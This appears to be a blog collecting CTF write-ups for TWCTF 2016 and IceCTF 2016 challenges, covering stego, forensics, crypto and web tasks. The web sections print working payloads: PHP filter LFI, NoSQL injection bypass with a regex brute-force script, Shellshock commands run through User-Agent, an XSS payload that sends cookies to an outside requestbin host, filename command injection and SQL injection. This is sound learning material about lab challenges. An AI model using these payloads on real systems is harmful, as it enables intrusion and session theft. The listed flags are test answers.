TWCTF{Write_up} -Tokyo Westerns/MMA CTF 2nd 2016

2:45:00 PM Unknown 0 Comments




Glance- 50 pt
We are given a Gif file and said that the flag is inside .(You found the challenging task here ) .Trying to investigate through the Stegosolve tool .
We have 201 frame let's extract them .

convert glance.gif flag.png

The picture is spliced into pieces ,every piece has a part of the flag.Let's merge the pieces to get the flag.


montage flag-*.png \-title x1 -shadow -geometry +1+1 \myflag.png






Global page- 50 pt
 At the first sight ,it looks like LFI vulnerability 
curl http://globalpage.chal.ctf.westerns.tokyo/?page=index.php
<!doctype html>
<html>
<head>    

<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<br />
<b>Notice</b>:  Undefined index: HTTP_ACCEPT_LANGUAGE in <b>/var/www/globalpage/index.php</b> on line <b>36</b><br />
<p>
<br />
<b>Warning</b>:  include(indexphp/.php): failed to open stream: No such file or directory in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
<br />
<b>Warning</b>:  include(): Failed opening 'indexphp/.php' for inclusion (include_path='.:/usr/share/php:/usr/share/pear') in <b>/var/www/globalpage/index.php</b> on line <b>41</b><br />
</p>
</body>
</html>
using php wrappers :D (php filtre is my besty)
curl -H "accept-language:/filter/convert.base64-encode/resource=index" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
Resposne from the server
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<p>
PD9waHAKaWYgKCFkZWZpbmVkKCdJTkNMVURFRF9JTkRFWCcpKSB7CmRlZmluZSgnSU5DTFVERURfSU5ERVgnLCB0cnVlKTsKaW5pX3NldCgnZGlzcGxheV9lcnJvcnMnLCAxKTsKaW5jbHVkZSAiZmxhZy5waHAiOwo/Pgo8IWRvY3R5cGUgaHRtbD4KPGh0bWw+CjxoZWFkPgo8bWV0YSBjaGFyc2V0PXV0Zi04Pgo8dGl0bGU+R2xvYmFsIFBhZ2U8L3RpdGxlPgo8c3R5bGU+Ci5ydGwgewogIGRpcmVjdGlvbjogcnRsOwp9Cjwvc3R5bGU+CjwvaGVhZD4KCjxib2R5Pgo8P3BocAokZGlyID0gIiI7CmlmKGlzc2V0KCRfR0VUWydwYWdlJ10pKSB7CgkkZGlyID0gc3RyX3JlcGxhY2UoWycuJywgJy8nXSwgJycsICRfR0VUWydwYWdlJ10pOwp9CgppZihlbXB0eSgkZGlyKSkgewo/Pgo8dWw+Cgk8bGk+PGEgaHJlZj0iLz9wYWdlPXRva3lvIj5Ub2t5bzwvYT48L2xpPgoJPGxpPjxkZWw+V2VzdGVybnM8L2RlbD48L2xpPgoJPGxpPjxhIGhyZWY9Ii8/cGFnZT1jdGYiPkNURjwvYT48L2xpPgo8L3VsPgo8P3BocAp9CmVsc2UgewoJZm9yZWFjaChleHBsb2RlKCIsIiwgJF9TRVJWRVJbJ0hUVFBfQUNDRVBUX0xBTkdVQUdFJ10pIGFzICRsYW5nKSB7CgkJJGwgPSB0cmltKGV4cGxvZGUoIjsiLCAkbGFuZylbMF0pOwo/Pgo8cDw/PSgkbD09PSdoZScpPyIgY2xhc3M9cnRsIjoiIj8+Pgo8P3BocAoJCWluY2x1ZGUgIiRkaXIvJGwucGhwIjsKPz4KPC9wPgo8P3BocAoJfQp9Cj8+CjwvYm9keT4KPC9odG1sPgo8P3BocAp9Cj8+Cg==</p>
</body>
</html>
Decode the script
<?php
if (!defined('INCLUDED_INDEX')) {
define('INCLUDED_INDEX', true);
ini_set('display_errors', 1);
include "flag.php";
?>
<!doctype html>
<html>
<head>
<meta charset=utf-8>
<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>
<?php
$dir = "";
if(isset($_GET['page'])) {
    $dir = str_replace(['.', '/'], '', $_GET['page']);
}

if(empty($dir)) {
?>
<ul>
    <li><a href="/?page=tokyo">Tokyo</a></li>
    <li><del>Westerns</del></li>
    <li><a href="/?page=ctf">CTF</a></li>
</ul>
<?php
}
else {
    foreach(explode(",", $_SERVER['HTTP_ACCEPT_LANGUAGE']) as $lang) {
        $l = trim(explode(";", $lang)[0]);
?>
<p<?=($l==='he')?" class=rtl":""?>>
<?php
        include "$dir/$l.php";
?>
</p>
<?php
    }
}
?>
</body>
</html>
<?php
}
?>
curl -H "accept-language:/filter/convert.base64-encode/resource=flag" http://globalpage.chal.ctf.westerns.tokyo/?page=php:
we received the flag content
<html>
<head>

<title>Global Page</title>
<style>
.rtl {
  direction: rtl;
}
</style>
</head>

<body>

PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==<br />

</body>
</html>
Now ,Decode with base64
echo "PD9waHAKJGZsYWcgPSAiVFdDVEZ7SV9mb3VuZF9zaW1wbGVfTEZJfSI7Cg==" | base64 -d


0 comments:

IceCTF{l33tcrypt_Cryptography_90_pt}

6:01:00 PM Unknown 0 Comments



Problem:
We were able to get some code, it seems to be encrypting using AES Cypher.
Here you can get the server file and it's running at nc l33tcrypt.vuln.icec.tf 6001

Hint :
l33tcrypt is a new and fresh encryption service. For added security it pads all information with the flag! Can you get it? 


Answer :

Overview :

The server get data and then appends a secret message, it encrypts this data and send it back to you. our goal is to get the secret message. The server encrypts in blocks of 16 bytes. Each time we reduce the input size one by one, then we try to suggess the char that give the same answer from the server.

Details :

your input must start with "l33tserver please" and also must be encrypted with base64.
then the serever decrypt input data and  appends secret data. it encrypts all of that data, and sends it back (as a base64 string) with a newline tacked on. I glean this from the following piece of code:

 def handle(self):

      .....

        data = recvline(req).strip()
        try:
            data = base64.b64decode(data)
        except:
            req.sendall("bad data\n")
            req.close()
            return
        if not data.startswith("l33tserver please"):
            req.sendall("You didnt say the magic word :(\n")
            req.close()
            return
        c = AESCipher(KEY).encrypt(pad(data, 16))
        req.sendall("Your l33tcrypted data:\n")
        req.sendall(base64.b64encode(c) + "\n")


If we look at the encryption algorithm on the server, you will notice they are using PyCrypto(Crypto.Cipher.AES). ThePyCrypto documentation for AES says that the encryption works in blocks of 16 bytes. If two plaintext blocks are identical, then they will produce identical ciphertext blocks. This is called electronic codebook mode (ECB) of the AES cypher. You can read more about ECB and why it is insecure here. I hope to be able to attack this cypher by manipulating it.

So we must fix our input length into equal multiple of 16.
This is an exemple of input with explication :

Here is two blocks of 16 after the key words:

len(input) == 48
            first block of 16 |                                2d |                                     |
input : "l33tserver pleaseAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"XXXX
                                                              this time the flag start from here |

After this block the server will appends the flag, and send back the ecrypted message 
next step involves resending data with length -1


len(input) == 47
            first block of 16 |                                2d |                                      |

input : "l33tserver pleaseAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAX"XXX
                                                           this time the flag start from here |

Now we resend the input with lenght 48 and every time change the last character until I find the same output.
This is the code that I used to find the flag.
You can download the code from here.



Flag : IceCTF{unleash_th3_Blocks_aNd_find_what_you_seek} :D

0 comments:

IceCTF{Write_up_Stage3_Stage4}

8:22:00 AM Unknown 0 Comments




Stage 3 

Vape Nation Stego-50pt
Open up the Stego solve and swipe filters  the flag hidden in the Green plane 0 filter

Audio problems Forensics -50 pt
open up the sonic visualizer .Go ahead to layer->add Spectogramme.


R.I.P Transmission  Forensics -65 pt

 Looking for the header of the file ,it is an ELF binary file .

but when we execute the elf file ./rip nothing looking interesting. so ,I have decided to strings the content and investigate inside

strings rip >rip_strings | subl rip_strings 

something weird ,Maybe ,an embedded file hidden inside . let's extract it.

foremost -T rip
a zip file with protected password comes out .Let's crack it with fcrackzip
fcrackzip -u -l 1-6 -c 'a1' 00002585.zip
password is :bunny

Extract the zip file and bingoo the flag is there

ChainedIn web 75 pt
The first thing that grabs my attention was in the home page foot bar .

We all know that MongoDB is an NOSql backend so ,closely the vulnerability could be a NoSQL injection ,I have read some articles about this type of injection and how to exploit it,but this was a challenge in root-me that includes the same vuln .With Burpsuite we can see that authentication  sent in JSON Format .



{"user":"admin","pass":"admin"}

and the response is :
{"message":"Invalid credential !"}
Let's try to bypass the authentication :
{"user":"admin","pass":{"$ne":"1"}}

We are authenticated as an administrator !! so, obviously its NoSQL injection good :D !
for more information visit this website http://blog.websecurify.com/2014/08/hacking-nodejs-and-mongodb.html

Let's now try to guess the password ,
{"user":{"$ne":"1"},"pass":{"$regex":"I.*$"}}

the server return {"message":"Welcome back Administrator!"} 200 ok ,let's try mix up some other character
{"user":{"$ne":"1"},"pass":{"$regex":"v.*$"}}
the server return {"message":"Invalid Credentials"} 500 Internal Server Error .
we know that the pattern of the flag is IceCTF{ and the service return 200 ok for the true check and 500 for false one and this is can help us to guess the next character and get the flag.I have written a python script to retrieve the flag .


import requests
ascii_letters = 'IabcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ{-_}'
def url(password):
  r = requests.post('http://chainedin.vuln.icec.tf/login', json={"user": {"$ne": "1"},"pass":{"$regex":password}})
  return r.status_code

def comp(flag):
 for i in ascii_letters:
  ch=flag+i+'.*$'
  #print i
  if url(ch)==200:
   flag+=i
   break
 return i

if __name__ == "__main__":
 flag="IceCTF{"
 for x in xrange(1,60):
  flag+=comp(flag)
  print flag


The flag is : IceCTF{I_tou0gHT_Y0u_coulDNt_inJeCt_noSqL_tHanKs_monGo}

Geocities web 100 pt
This task  takes me a while to solve it ! the service seems clean nothing looking strange and the website looking very old .So,I have tried to scan the target to identifies anything ,I have used dir search,Nikto,vega but nothing came out ! so , reading more the challenge description looking for a hint and here we go, it's maybe shell Shock vulnerability because he said "It must be running some ancient technology and probably hasn't been updated in years" .I found this article very useful to start the exploit .
Let's check the vuln 
curl -A "() { :; }; echo 'Content-type: text/html'; echo; /usr/bin/id;" http://geocities.vuln.icec.tf/

Bingo ! it returns the uid and the gid so the service is vulnerable to Shell Sock attack
now run the bash in the host and ls the files
() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'ls'

cat get_posts.pl

User-Agent:() { :; }; echo 'Content-type: text/html'; echo; /bin/bash -c 'cat get_posts.pl'

Obviously ,the flag is hidden in the database we need to fetch the tables name on the DB change the code ,save it on ur host and download it to the machine using wget .

#!/usr/bin/perl
use strict;
use DBI;
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
my tables = $dbh->tables();
print tables;
$dbh->disconnect();
now change the code to select from 47a6fd2ca39d2b0d6eea1c30008dd889 table

#!/usr/bin/perl
 
use strict;
use DBI;
 
my $dbh = DBI->connect(
    "dbi:mysql:dbname=geocities;host=icectf_mariadb",
    "geocities",
    "geocities",
    { RaiseError => 1 },
) or die $DBI::errstr;
 
my $sth = $dbh->prepare("SELECT * FROM 47a6fd2ca39d2b0d6eea1c30008dd889");
$sth->execute();
 
my $row;
while ($row = $sth->fetchrow_arrayref()) {
    print "@$row[1];@$row[2];@$row[3]\n";
}
 
$sth->finish();
$dbh->disconnect();

The flag is : IceCTF{7h3_g0s_WEr3_5UpeR_wE1Rd_mY_3ye5_HUr7}


Intercepted Conversations Pt. 1
Intercepted Conversations Pt. 2

Stage 4

ImgBlog web 130 pt
 After register/login we have check  it the comment field it's vulnerable to XSS attack.


we need to get the admin session to login as admin .
<img src=x onerror=this.src='http://requestb.in/xfkbrpxf?c='+document.cookie>

Now we get the admin session ,change the current session with cookie manager and refresh the page


session=eyJ1c2VyIjoxfQ.CpyE3w.eBmlIu3HEm7vpDtAlE63CbMIK5A

and here we go we are in !
I have tried a little bit to upload pictures and inject the file name with null byte ,double extension, and comment SQL injection ,but nothing works ,I noticed that the service filters our requests of "filename" field ,remove (dots),(splashes) then use the Linux bash ,I think it's shell_exec() function of PHP ! ,So,Let's inject export $PATH to see how it will react !

The global path of linux is shown ! so let's ls files


filename=" $HOME | ls "

We identified flag.txt file .


filename=" $HOME | cat fl* "

0 comments:

IceCTF{Write_up_Stage1_Stage2}

5:15:00 PM Unknown 0 Comments


Stage 1


Spotlight [web-10 pt]
After looking around seeking for the flag ,inspect the element of the web page and the flag is in the console tab .
The Flag is: IceCTF{5tup1d_d3v5_w1th_th31r_l095}


All your Base are belong to us [Misc -15 pt]
Convert the binary to ASCII .
The flag is : IceCTF{al1_my_bases_are_yours_and_all_y0ur_bases_are_mine}

Rotated! [Cryptography 20 pt]
The given text is VprPGS{jnvg_bar_cyhf_1_vf_3?} ,decode the flag with ROT13 algorithm .
The flag is: IceCTF{wait_one_plus_1_is_3?}

Substituted [Cryptography -30 pt]
The title mention a hint to decode the text the "Substitution" algorithm ,easily using cryptool we can 
decode the text
as you can see after decoding the text include some errors and the flag not correct .
Change the "P" letter with "w" and now the flag appears to be correct.


The flag is : IceCTF{always_listen_to_your_substitute_flags}

Time Traveler [Forensics -45 pt ]
After you looking around on the archive.org go back to 1 JUN and the is there .

Scavenger Hunt [Misc -50pt ]
I have downloaded the icectf website from the github (you can find the github link in footer bar 
in the home page of icectf ) then run grep -nr "IceCTF{" 

the flag is : IceCTF{Y0u_c4n7_533_ME_iM_h1Din9}

IRC 1 [Misc -35pt ]


The task mention that "There is someone sharing flags on our IRC" so,we connected to the irc server using irssi 
/connect glitch.is



take a look at the channels available on the server, to do that ,type /list and here we go the flag is there !


The flag is : IceCTF{pL3AsE_D0n7_5h4re_fL495_JUsT_doNT}


Stage 2

Complacent [Reconnaissance -40pt]
There is no valid certification on the website ,open the certificate details and the flag found there .
the flag is : IceCTF{this_1nformation_wasnt_h1dd3n_at_a11}


Search [Misc -40pt]
 Googling a while for the dnslook up and we have found this website http://mxtoolbox.com/SuperTool.aspx
the flag is : IceCTF{flag5_all_0v3r_the_Plac3}


Flag Storage [Web -50 pt]
In the username inject a simple SQLinjection and u get the flag


'or 1=1#



Kitty [web -70 pt]
We retrieved the hash of the admin password from the task description :
c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a 
checkout the hash type using duckduckgo

it's Sha2-256 through the md5hashing website we are able to crack the hash .

c7e83c01ed3ef54812673569b2d79c4e1f6554ffeb27706e98c067de9ab12d1a=Vo83*
try now to login to admin session:
 
username:admin , password:Vo83*


0 comments: